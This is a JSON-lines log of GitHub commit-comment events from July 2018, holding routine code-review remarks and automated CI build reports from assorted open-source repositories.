{"id":"7948169309","type":"CommitCommentEvent","actor":{"login":"mitchins"},"repo":{"name":"mitchins/micropython"},"payload":{"comment":{"id":29666914,"position":124,"line":360,"path":"ports/esp32/modnetwork.c","commit_id":"dd5ccce0f6856d3136a936e09b34e216d1a15ea3","created_at":"2018-07-11T07:07:21Z","updated_at":"2018-07-11T07:07:21Z","author_association":"OWNER","body":"One more thing, where's the complete list of MP_QSTR_STAT_* I have a hard time finding it as I think it's a macro? I will map as many as I can"}},"created_at":"2018-07-11T07:07:21Z"}
{"id":"7948173304","type":"CommitCommentEvent","actor":{"login":"lchrusciel"},"repo":{"name":"Sylius/Sylius"},"payload":{"comment":{"id":29666919,"position":16,"line":76,"path":"src/Sylius/Bundle/UserBundle/EventListener/UserLastLoginSubscriber.php","commit_id":"59b8ea2335875653cd055d188944939a7f20af0d","created_at":"2018-07-11T07:08:24Z","updated_at":"2018-07-11T07:08:24Z","author_association":"MEMBER","body":"BC"}},"created_at":"2018-07-11T07:08:24Z"}
{"id":"7948173975","type":"CommitCommentEvent","actor":{"login":"venkey8111"},"repo":{"name":"venkey8111/hello-world"},"payload":{"comment":{"id":29666922,"position":null,"line":null,"path":null,"commit_id":"766db2dd564bca632794041f9e098a11c8cca6ba","created_at":"2018-07-11T07:08:33Z","updated_at":"2018-07-11T07:08:33Z","author_association":"OWNER","body":"First Commit"}},"created_at":"2018-07-11T07:08:33Z"}
{"id":"7948176868","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29666930,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-11T07:09:13Z","updated_at":"2018-07-11T07:09:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T07:09:13Z"}
{"id":"7948178248","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29666931,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-11T07:09:32Z","updated_at":"2018-07-11T07:09:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T07:09:32Z"}
{"id":"7948179030","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29666932,"position":24,"line":373,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/StageDatabase.java","commit_id":"6c0f1c89f4634c9437f93df07ef40ccb14074931","created_at":"2018-07-11T07:09:43Z","updated_at":"2018-07-11T07:09:43Z","author_association":"NONE","body":"We should probably revert the unix time addition to insertLoadedUser and instead update unixTime when we go from auto_pause to playing"}},"created_at":"2018-07-11T07:09:43Z"}
{"id":"7948179411","type":"CommitCommentEvent","actor":{"login":"namhv"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29666933,"position":35,"line":35,"path":"app/src/main/java/com/hai/note/activity/MainActivity.java","commit_id":"793c193fe5a895394d26bd86171d8884ea7538db","created_at":"2018-07-11T07:09:49Z","updated_at":"2018-07-11T07:09:49Z","author_association":"COLLABORATOR","body":"Nên format lại code khi save file"}},"created_at":"2018-07-11T07:09:49Z"}
{"id":"7948181647","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29666937,"position":29,"line":377,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/StageDatabase.java","commit_id":"6c0f1c89f4634c9437f93df07ef40ccb14074931","created_at":"2018-07-11T07:10:21Z","updated_at":"2018-07-11T07:10:21Z","author_association":"NONE","body":"Remove this logic.  See comment above"}},"created_at":"2018-07-11T07:10:21Z"}
{"id":"7948181928","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"cproc/genode"},"payload":{"comment":{"id":29666938,"position":null,"line":null,"path":null,"commit_id":"4fd044fcab8fdb491866cfe35a15fc8f98d17aeb","created_at":"2018-07-11T07:10:26Z","updated_at":"2018-07-11T07:10:26Z","author_association":"NONE","body":"Good catch. It may also be a worthwhile optimization to pass only those sets to `select()` that where changed in the loop and, thus, contain set fds."}},"created_at":"2018-07-11T07:10:26Z"}
{"id":"7948184406","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"mitchins/micropython"},"payload":{"comment":{"id":29666941,"position":124,"line":360,"path":"ports/esp32/modnetwork.c","commit_id":"dd5ccce0f6856d3136a936e09b34e216d1a15ea3","created_at":"2018-07-11T07:11:01Z","updated_at":"2018-07-11T07:11:01Z","author_association":"NONE","body":"small ints are 31 bits signed, so 30 bits unsigned.\r\n\r\nThe MP_QSTR_* are auto generated.  You just define whatever you want.  But try to follow what esp8266 already has."}},"created_at":"2018-07-11T07:11:01Z"}
{"id":"7948184603","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29666942,"position":null,"line":null,"path":null,"commit_id":"4fb7f15e7646e692691af38249185bc7b90d00b8","created_at":"2018-07-11T07:11:04Z","updated_at":"2018-07-11T07:11:04Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 34](https://teamcity.otenv.com/viewLog.html?buildId=8907688&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 21, ignored: 1 Build time: 00:10:33"}},"created_at":"2018-07-11T07:11:04Z"}
{"id":"7948185966","type":"CommitCommentEvent","actor":{"login":"namhv"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29666943,"position":66,"line":66,"path":"app/src/main/java/com/hai/note/activity/AddNoteActivity.java","commit_id":"0ad415d114cce81c4d8926b2788b93b3e2ac55de","created_at":"2018-07-11T07:11:22Z","updated_at":"2018-07-11T07:11:22Z","author_association":"COLLABORATOR","body":"Thêm phạm vi truy cập của biến vào."}},"created_at":"2018-07-11T07:11:22Z"}
{"id":"7948188708","type":"CommitCommentEvent","actor":{"login":"einbond"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29666949,"position":null,"line":null,"path":null,"commit_id":"bfc65991f853bfe905ffada0bb636a1a3a133f2e","created_at":"2018-07-11T07:12:04Z","updated_at":"2018-07-11T07:12:04Z","author_association":"COLLABORATOR","body":"Where is this patch? It seems to have disappeared from the current branch."}},"created_at":"2018-07-11T07:12:04Z"}
{"id":"7948191107","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"cproc/genode"},"payload":{"comment":{"id":29666955,"position":null,"line":null,"path":null,"commit_id":"d73913b5444b9ca8097ef03938a4a3c8ff838f4e","created_at":"2018-07-11T07:12:39Z","updated_at":"2018-07-11T07:12:39Z","author_association":"NONE","body":"Oh, is this the mystical bug I never caught with those strange fd-number increment?"}},"created_at":"2018-07-11T07:12:39Z"}
{"id":"7948191344","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_msm8996-common"},"payload":{"comment":{"id":29666957,"position":null,"line":null,"path":null,"commit_id":"c20e6b7e2007f58e9e1c1842285e21b6166f6706","created_at":"2018-07-11T07:12:42Z","updated_at":"2018-07-11T07:12:42Z","author_association":"MEMBER","body":"This HAL crashes. If it affects anything, I'll look into it more, but atm everything seems fine without it."}},"created_at":"2018-07-11T07:12:42Z"}
{"id":"7948193947","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29666960,"position":5,"line":141,"path":"src/vs/editor/contrib/referenceSearch/referenceSearch.ts","commit_id":"5271932ab95f5aa5c2af18c70ebff8aa3da5d659","created_at":"2018-07-11T07:13:18Z","updated_at":"2018-07-11T07:13:18Z","author_association":"MEMBER","body":"Oh, good one..."}},"created_at":"2018-07-11T07:13:18Z"}
{"id":"7948196057","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29666969,"position":null,"line":null,"path":null,"commit_id":"88c36b9304ddd8941d251a33a6092f353cee3af5","created_at":"2018-07-11T07:13:49Z","updated_at":"2018-07-11T07:13:49Z","author_association":"OWNER","body":"\r\n#21 "}},"created_at":"2018-07-11T07:13:49Z"}
{"id":"7948197113","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666972,"position":null,"line":null,"path":null,"commit_id":"a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec","created_at":"2018-07-11T07:14:06Z","updated_at":"2018-07-11T07:14:06Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8f7a9f8b8d6d9406ac7958fe25a5c5751a874ec-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T07:14:06Z"}
{"id":"7948198020","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29666973,"position":null,"line":null,"path":null,"commit_id":"0cff66522337fc0b57dd26e4b6db2b57874a0537","created_at":"2018-07-11T07:14:18Z","updated_at":"2018-07-11T07:14:18Z","author_association":"OWNER","body":"It has been deprecated for years. I wish people paid at least some attention to deprecation messages. :-)"}},"created_at":"2018-07-11T07:14:18Z"}
{"id":"7948201190","type":"CommitCommentEvent","actor":{"login":"rneher"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29666978,"position":null,"line":null,"path":null,"commit_id":"72c6fabf340263a9179cf8bbee04281429566074","created_at":"2018-07-11T07:15:07Z","updated_at":"2018-07-11T07:15:07Z","author_association":"MEMBER","body":"@jameshadfield , our lat-long file is uniformly lower case and auspice handles cases of countries and places. why would lower-casing here be a bad idea? "}},"created_at":"2018-07-11T07:15:07Z"}
{"id":"7948201459","type":"CommitCommentEvent","actor":{"login":"Luke1982"},"repo":{"name":"tsolucio/corebos"},"payload":{"comment":{"id":29666979,"position":null,"line":null,"path":null,"commit_id":"3012f2decf5fc2bfe302c8cddc0c6b474ed30917","created_at":"2018-07-11T07:15:12Z","updated_at":"2018-07-11T07:15:12Z","author_association":"CONTRIBUTOR","body":"Woops, my bad."}},"created_at":"2018-07-11T07:15:12Z"}
{"id":"7948201992","type":"CommitCommentEvent","actor":{"login":"thaJeztah"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29666982,"position":1,"line":1,"path":"sysx/chmod_unix.go","commit_id":"ec588492771b11c6197b2c1b95490b0bb380ad7f","created_at":"2018-07-11T07:15:19Z","updated_at":"2018-07-11T07:15:19Z","author_association":"NONE","body":"perhaps `!windows`?"}},"created_at":"2018-07-11T07:15:19Z"}
{"id":"7948208910","type":"CommitCommentEvent","actor":{"login":"joebordes"},"repo":{"name":"tsolucio/corebos"},"payload":{"comment":{"id":29666995,"position":null,"line":null,"path":null,"commit_id":"3012f2decf5fc2bfe302c8cddc0c6b474ed30917","created_at":"2018-07-11T07:16:59Z","updated_at":"2018-07-11T07:16:59Z","author_association":"CONTRIBUTOR","body":"no problem :-)"}},"created_at":"2018-07-11T07:16:59Z"}
{"id":"7948209100","type":"CommitCommentEvent","actor":{"login":"ihulsbus"},"repo":{"name":"afklm/crowd"},"payload":{"comment":{"id":29666998,"position":null,"line":null,"path":null,"commit_id":"33a0fd7838a17f59e36697713cfcd44d1fd369d8","created_at":"2018-07-11T07:17:02Z","updated_at":"2018-07-11T07:17:02Z","author_association":"MEMBER","body":"@katbyte Thanks for the interest. We'll get back to you ASAP!"}},"created_at":"2018-07-11T07:17:02Z"}
{"id":"7948210865","type":"CommitCommentEvent","actor":{"login":"trumpeta"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29667002,"position":null,"line":null,"path":null,"commit_id":"16c19cc0d55d7fae329643983d181bb1e5ad8b33","created_at":"2018-07-11T07:17:27Z","updated_at":"2018-07-11T07:17:27Z","author_association":"NONE","body":"So in short there's no uBO scriptlet working on all platforms and tampering this script desired way? FF legacy not published in assets would suffice for personal solution. \r\nIf so that's unfortunate, any other FF addon can do that ? Eg. by GM userscript, an idea. "}},"created_at":"2018-07-11T07:17:27Z"}
{"id":"7948212475","type":"CommitCommentEvent","actor":{"login":"kkufova"},"repo":{"name":"kiegroup/droolsjbpm-integration"},"payload":{"comment":{"id":29667004,"position":5,"line":8,"path":"kie-tomcat-integration/pom.xml","commit_id":"1328e53971d8bbfd88d4f8637882fd4d7260953d","created_at":"2018-07-11T07:17:51Z","updated_at":"2018-07-11T07:17:51Z","author_association":"NONE","body":"@mbiarnes, this change causes the following error on `master`:\r\n\r\n> Failed to execute goal on project kie-tomcat-integration: Could not resolve dependencies for project org.kie:kie-tomcat-integration:jar:7.9.0-SNAPSHOT: Could not find artifact org.apache.tomcat:catalina:jar:9.0.10 in jboss-public-repository-group (https://repository.jboss.org/nexus/content/groups/public/).\r\n\r\nFull console log: https://kie-jenkins.rhev-ci-vms.eng.rdu2.redhat.com/job/drools-wb-pullrequests/1369/console\r\n\r\nI checked the `7.7.x` branch and the build pass there. Could you please take a look?"}},"created_at":"2018-07-11T07:17:51Z"}
{"id":"7948213115","type":"CommitCommentEvent","actor":{"login":"madspider"},"repo":{"name":"madspider/myphplavarelproject"},"payload":{"comment":{"id":29667005,"position":null,"line":null,"path":null,"commit_id":"b17abd774a5746296a400f0e29ad9e88a64acf22","created_at":"2018-07-11T07:18:00Z","updated_at":"2018-07-11T07:18:00Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-11T07:18:00Z"}
{"id":"7948215690","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29667010,"position":null,"line":null,"path":null,"commit_id":"0c5d1b3639acd86205efb8b15ad56e996abe606c","created_at":"2018-07-11T07:18:39Z","updated_at":"2018-07-11T07:18:39Z","author_association":"MEMBER","body":"nand-sata-install tested successfully on Rock64. Though logging doesn't work correctly any more. It seems `armbian-hardware-monitor` isn't called at shutdown at all."}},"created_at":"2018-07-11T07:18:39Z"}
{"id":"7948216058","type":"CommitCommentEvent","actor":{"login":"mrcarlberg"},"repo":{"name":"cappuccino/cappuccino"},"payload":{"comment":{"id":29667011,"position":null,"line":null,"path":null,"commit_id":"5bfafaf241a4789d4fe143efbbc657faddb0c0f8","created_at":"2018-07-11T07:18:44Z","updated_at":"2018-07-11T07:18:44Z","author_association":"MEMBER","body":"Ok, I will revert this one"}},"created_at":"2018-07-11T07:18:44Z"}
{"id":"7948216633","type":"CommitCommentEvent","actor":{"login":"marijnh"},"repo":{"name":"marijnh/Eloquent-JavaScript"},"payload":{"comment":{"id":29667013,"position":null,"line":null,"path":null,"commit_id":"2f3cbd525345a85d02c5b00d0cbc69173341e5b7","created_at":"2018-07-11T07:18:52Z","updated_at":"2018-07-11T07:18:52Z","author_association":"OWNER","body":"No Starch's house style is to not hyphenate this even in adjective role, so I went with that."}},"created_at":"2018-07-11T07:18:52Z"}
{"id":"7948217988","type":"CommitCommentEvent","actor":{"login":"thaJeztah"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29667017,"position":4,"line":9,"path":"sysx/chmod_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T07:19:13Z","updated_at":"2018-07-11T07:19:13Z","author_association":"NONE","body":"Looks like we're not consistent now; either both should use the original case, or both should use camelcase"}},"created_at":"2018-07-11T07:19:13Z"}
{"id":"7948220738","type":"CommitCommentEvent","actor":{"login":"manpreetkaurJ90"},"repo":{"name":"manpreetkaurJ90/Test-Project-2"},"payload":{"comment":{"id":29667026,"position":null,"line":null,"path":null,"commit_id":"6e269590a0ffa21b73580ffccf21c8925a87a0b3","created_at":"2018-07-11T07:19:54Z","updated_at":"2018-07-11T07:19:54Z","author_association":"OWNER","body":"5"}},"created_at":"2018-07-11T07:19:54Z"}
{"id":"7948224321","type":"CommitCommentEvent","actor":{"login":"sara0871"},"repo":{"name":"wangshub/Douyin-Bot"},"payload":{"comment":{"id":29667030,"position":null,"line":null,"path":null,"commit_id":"704b0819bd5e627d520b5d1fd40e1ef34a01c23e","created_at":"2018-07-11T07:20:44Z","updated_at":"2018-07-11T07:20:44Z","author_association":"NONE","body":"👌"}},"created_at":"2018-07-11T07:20:44Z"}
{"id":"7948227174","type":"CommitCommentEvent","actor":{"login":"empressbat"},"repo":{"name":"certau/ir2go"},"payload":{"comment":{"id":29667035,"position":null,"line":null,"path":null,"commit_id":"9f4ab527e80d3a73239553820b386f3c4f79618c","created_at":"2018-07-11T07:21:23Z","updated_at":"2018-07-11T07:21:23Z","author_association":"NONE","body":"This is great @birdman4512 "}},"created_at":"2018-07-11T07:21:23Z"}
{"id":"7948227201","type":"CommitCommentEvent","actor":{"login":"gunterze"},"repo":{"name":"dcm4che/dcm4chee-arc-light"},"payload":{"comment":{"id":29667036,"position":12,"line":202,"path":"dcm4chee-arc-diff/src/main/java/org/dcm4chee/arc/diff/impl/DiffServiceEJB.java","commit_id":"406345ca951deb2c25e37fc6c74c24c98a0305ba","created_at":"2018-07-11T07:21:24Z","updated_at":"2018-07-11T07:21:24Z","author_association":"MEMBER","body":"QueryTaskFetchSize != QueryFetchSize !\r\nQueryTaskFetchSize is used to limit the number of requested rows in one query, QueryFetchSize is a [hint for the JDBC Driver how many rows shall be fetch at once from the DB](https://docs.oracle.com/javase/7/docs/api/java/sql/Statement.html#setFetchSize(int))."}},"created_at":"2018-07-11T07:21:24Z"}
{"id":"7948227785","type":"CommitCommentEvent","actor":{"login":"thaJeztah"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29667038,"position":24,"line":30,"path":"driver/driver_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T07:21:32Z","updated_at":"2018-07-11T07:21:32Z","author_association":"NONE","body":"> If pathname is relative and dirfd is the special value\r\n> AT_FDCW\r\n\r\nWhat if pathname is absolute and dirfd is the special value AT_FDCW?"}},"created_at":"2018-07-11T07:21:32Z"}
{"id":"7948230919","type":"CommitCommentEvent","actor":{"login":"mrcarlberg"},"repo":{"name":"cappuccino/cappuccino"},"payload":{"comment":{"id":29667043,"position":null,"line":null,"path":null,"commit_id":"5bfafaf241a4789d4fe143efbbc657faddb0c0f8","created_at":"2018-07-11T07:22:14Z","updated_at":"2018-07-11T07:22:14Z","author_association":"MEMBER","body":"Done!"}},"created_at":"2018-07-11T07:22:14Z"}
{"id":"7948230933","type":"CommitCommentEvent","actor":{"login":"wqwyes"},"repo":{"name":"wqwyes/gitdemo"},"payload":{"comment":{"id":29667044,"position":null,"line":null,"path":null,"commit_id":"c3009a37511b83d63408de4fcaabea5b7f10e505","created_at":"2018-07-11T07:22:14Z","updated_at":"2018-07-11T07:22:14Z","author_association":"OWNER","body":"this is a test"}},"created_at":"2018-07-11T07:22:14Z"}
{"id":"7948231211","type":"CommitCommentEvent","actor":{"login":"JCSeaholm"},"repo":{"name":"JCSeaholm/Unnamed-Game"},"payload":{"comment":{"id":29667046,"position":null,"line":null,"path":null,"commit_id":"beefd8cb9684990cf5b9edf030642467e5e36e91","created_at":"2018-07-11T07:22:17Z","updated_at":"2018-07-11T07:22:17Z","author_association":"OWNER","body":"Forgot to describe my commit. What I've done here is created an interface between the rest of our project and the user's JSON file for settings. The functions I've defined are pretty generic, so we can use that format for changing other settings down the road."}},"created_at":"2018-07-11T07:22:17Z"}
{"id":"7948234036","type":"CommitCommentEvent","actor":{"login":"dendrocyte"},"repo":{"name":"zxing/zxing"},"payload":{"comment":{"id":29667054,"position":null,"line":null,"path":null,"commit_id":"db5f3ac62cb7965ff323efb1688b0f5f5f152ab3","created_at":"2018-07-11T07:22:56Z","updated_at":"2018-07-11T07:22:56Z","author_association":"NONE","body":"I cannot sync successfully at com.google.zxing:zxing-parent:3.3.4-SNAPSHOT"}},"created_at":"2018-07-11T07:22:56Z"}
{"id":"7948234380","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29667055,"position":null,"line":null,"path":null,"commit_id":"6b270bca0c70d67f23650a4d242d98ff26e87614","created_at":"2018-07-11T07:23:01Z","updated_at":"2018-07-11T07:23:01Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-MacOS-10.9-clang: OK (2932 of 2933 tests passed, 114 test warnings)\n\nMessages:\n\n * 97 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 16 tests had: Table small diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6b270bca0c70d67f23650a4d242d98ff26e87614-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6b270bca0c70d67f23650a4d242d98ff26e87614-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T07:23:01Z"}
{"id":"7948259518","type":"CommitCommentEvent","actor":{"login":"joshuous"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8998"},"payload":{"comment":{"id":29667109,"position":null,"line":null,"path":null,"commit_id":"552775c39ca5640d741b944c90be47001c7c6410","created_at":"2018-07-11T07:28:52Z","updated_at":"2018-07-11T07:28:52Z","author_association":"OWNER","body":"@tbalden, thanks any peer-review (testing, code quality, etc) on this change would be greatly appreciated"}},"created_at":"2018-07-11T07:28:52Z"}
{"id":"7948259928","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29667110,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-11T07:28:58Z","updated_at":"2018-07-11T07:28:58Z","author_association":"MEMBER","body":"1. I'll do it later.\r\n2. `Make player fly` isn't proper grammar."}},"created_at":"2018-07-11T07:28:58Z"}
{"id":"7948262093","type":"CommitCommentEvent","actor":{"login":"clandmeter"},"repo":{"name":"ExtremeNerd/apk-tools"},"payload":{"comment":{"id":29667114,"position":null,"line":null,"path":null,"commit_id":"dd46d54e8d1593806628e8d853494e38b7de848b","created_at":"2018-07-11T07:29:27Z","updated_at":"2018-07-11T07:29:27Z","author_association":"NONE","body":"@ExtremeNerd Can you please setup your own travis integration? its spamming out irc channel.\r\n\r\ncc @jirutka "}},"created_at":"2018-07-11T07:29:27Z"}
{"id":"7948265357","type":"CommitCommentEvent","actor":{"login":"philippotto"},"repo":{"name":"scalableminds/webknossos"},"payload":{"comment":{"id":29667120,"position":4,"line":20,"path":"docker-compose.yml","commit_id":"c69c33982527831b5b4abfe2f070659c370efaf0","created_at":"2018-07-11T07:30:12Z","updated_at":"2018-07-11T07:30:12Z","author_association":"MEMBER","body":"Ah, I already wondered where these are defined :+1: "}},"created_at":"2018-07-11T07:30:12Z"}
{"id":"7948268802","type":"CommitCommentEvent","actor":{"login":"yuga528"},"repo":{"name":"yuga528/network-sec"},"payload":{"comment":{"id":29667131,"position":91,"line":283,"path":"network-sec-430.sh","commit_id":"824db3e093a3dcc7ae7c8d60febe8ec5aee3e352","created_at":"2018-07-11T07:30:56Z","updated_at":"2018-07-11T07:30:56Z","author_association":"OWNER","body":"Thanks for adding."}},"created_at":"2018-07-11T07:30:56Z"}
{"id":"7948269127","type":"CommitCommentEvent","actor":{"login":"Phreework"},"repo":{"name":"IndieGuide/China-IndieGame-Wiki"},"payload":{"comment":{"id":29667132,"position":null,"line":null,"path":null,"commit_id":"c549d2d198ef6ab281a31276ab7873ff6fb6f207","created_at":"2018-07-11T07:31:00Z","updated_at":"2018-07-11T07:31:00Z","author_association":"COLLABORATOR","body":"thats awesome"}},"created_at":"2018-07-11T07:31:00Z"}
{"id":"7948273534","type":"CommitCommentEvent","actor":{"login":"Myapp18"},"repo":{"name":"StartApp-SDK/StartApp_InApp_SDK_Example"},"payload":{"comment":{"id":29667141,"position":6,"line":7,"path":"build.gradle","commit_id":"e7052cb329082d137446fb6844cc343fa8c10a03","created_at":"2018-07-11T07:32:01Z","updated_at":"2018-07-11T07:32:01Z","author_association":"NONE","body":"StartApp-SDK.3cef47d9"}},"created_at":"2018-07-11T07:32:01Z"}
{"id":"7948273728","type":"CommitCommentEvent","actor":{"login":"apple-viktory"},"repo":{"name":"apple-viktory/apple-viktory.github.io"},"payload":{"comment":{"id":29667142,"position":null,"line":null,"path":null,"commit_id":"d729125750a4011ffde65608a7c43ae8503aab85","created_at":"2018-07-11T07:32:04Z","updated_at":"2018-07-11T07:32:04Z","author_association":"OWNER","body":"112"}},"created_at":"2018-07-11T07:32:04Z"}
{"id":"7948273970","type":"CommitCommentEvent","actor":{"login":"namhv"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29667145,"position":17,"line":17,"path":"app/src/main/java/com/hai/note/activity/base/BaseActivity.java","commit_id":"1812d4a15c2f3d6081b770904f24a7b76a722eb5","created_at":"2018-07-11T07:32:07Z","updated_at":"2018-07-11T07:32:07Z","author_association":"COLLABORATOR","body":"Cái này để làm gì vậy?"}},"created_at":"2018-07-11T07:32:07Z"}
{"id":"7948274738","type":"CommitCommentEvent","actor":{"login":"RapeFactory"},"repo":{"name":"oknosoft/windowbuilder"},"payload":{"comment":{"id":29667149,"position":38,"line":2981,"path":"dist/windowbuilder.js","commit_id":"225b3f32d74945d0fce90032ec59a488cc529e94","created_at":"2018-07-11T07:32:16Z","updated_at":"2018-07-11T07:32:16Z","author_association":"CONTRIBUTOR","body":"Нарисовал контур из 6 элементов, а свойство `.is_rectangular` дает `true` из-за первого сравнения.\r\nПричем у объекта контура два разных геттера отрабатывают."}},"created_at":"2018-07-11T07:32:16Z"}
{"id":"7948274873","type":"CommitCommentEvent","actor":{"login":"buko"},"repo":{"name":"EXIficient/exificient"},"payload":{"comment":{"id":29667150,"position":21,"line":435,"path":"src/main/java/com/siemens/ct/exi/main/api/stream/StAXDecoder.java","commit_id":"59b9aa37d0fbdfc9f08bbb149da3c36e11373557","created_at":"2018-07-11T07:32:18Z","updated_at":"2018-07-11T07:32:18Z","author_association":"NONE","body":"I don't understand this codebase that well, sorry... what I was trying to explain is that the namespaceCount is not the same as the namespaceContext. In this example:\r\n\r\n```\r\n<message xmlns:a=\"...\">\r\n  <type xmlns:b=\"...\">\r\n   </type>\r\n</message>\r\n```\r\nthe namespaceCount for type is 1. But the namespaceContext -- the number of namespaces \"in effect\" for the type element -- is of course 2.\r\n\r\nI might be confused but it looks like the code below (return this.eePrefixes) was returning the namespaceContext and not the namespaceCount?\r\n\r\n"}},"created_at":"2018-07-11T07:32:18Z"}
{"id":"7948276830","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29667155,"position":null,"line":null,"path":null,"commit_id":"0cff66522337fc0b57dd26e4b6db2b57874a0537","created_at":"2018-07-11T07:32:46Z","updated_at":"2018-07-11T07:32:46Z","author_association":"OWNER","body":"(I'll add it back in a bit)"}},"created_at":"2018-07-11T07:32:46Z"}
{"id":"7948278596","type":"CommitCommentEvent","actor":{"login":"lwaldron"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29667161,"position":117,"line":148,"path":"Ramos_MultiAssayExperiment.Rmd","commit_id":"6802acd0858a98f660333e6528ec0fbef5bc2632","created_at":"2018-07-11T07:33:12Z","updated_at":"2018-07-11T07:33:12Z","author_association":"COLLABORATOR","body":"This is unnecessarily complicated, your typical users aren't programmers :). See simplifications I'm making today."}},"created_at":"2018-07-11T07:33:12Z"}
